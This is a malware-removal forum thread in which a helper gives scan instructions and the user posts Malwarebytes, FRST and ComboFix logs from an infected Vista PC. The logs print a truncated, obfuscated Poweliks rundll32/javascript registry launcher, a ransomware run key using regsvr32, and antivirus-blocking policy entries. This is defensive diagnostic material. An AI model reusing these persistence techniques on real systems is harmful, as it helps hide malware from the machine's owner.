c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe
c:\\?\c:\windows\system32\wbem\WMIADAP.EXE
c:\program files\Windows Media Player\wmpnetwk.exe
c:\windows\system32\rundll32.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
.
**************************************************************************
.
Completion time: 2014-08-24  15:45:51 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-24 19:45
ComboFix2.txt  2014-08-23 20:16
ComboFix3.txt  2014-08-23 18:22
.
Pre-Run: 238,198,915,072 bytes free
Post-Run: 238,199,603,200 bytes free
.
- - End Of File - - 836BEC6E629D99F479DEE501CB2CA845
5C616939100B85E558DA92B899A0FC36
Link to post
Share on other sites

Good so far.


51a46ae42d560-malwarebytes_anti_malware. Scan with Malwarebytes' Anti-Malware

Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.

  • First of all select update.
  • Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.
  • Click the Scan tab, choose Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.



FRST.gif Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

Link to post
Share on other sites

I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs:

 

MBAM

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/25/2014
Scan Time: 8:28:24 AM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.25.02
Rootkit Database: v2014.08.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: savas.kyriakidis
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 355293
Time Elapsed: 27 min, 27 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 4
PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], 
PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], 
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [74251faa205b3bfbe62350acc2409a66], 
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [990042871b6054e235d494683ac823dd], 
 
Registry Values: 1
Trojan.Ransom.Gen, HKU\S-1-5-21-3726736968-409882640-1958551794-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IrfuqApivh, regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat", Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Trojan.Ransom.Gen, C:\ProgramData\IrfuqApivh\IrfuqApivh.dat, Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
FRST
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 09:47:13
Running from G:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt
2014-08-24 15:23 - 2014-08-24 15:46 - 00000000 ____D () C:\ComboFix
2014-08-23 16:54 - 2014-08-25 09:47 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
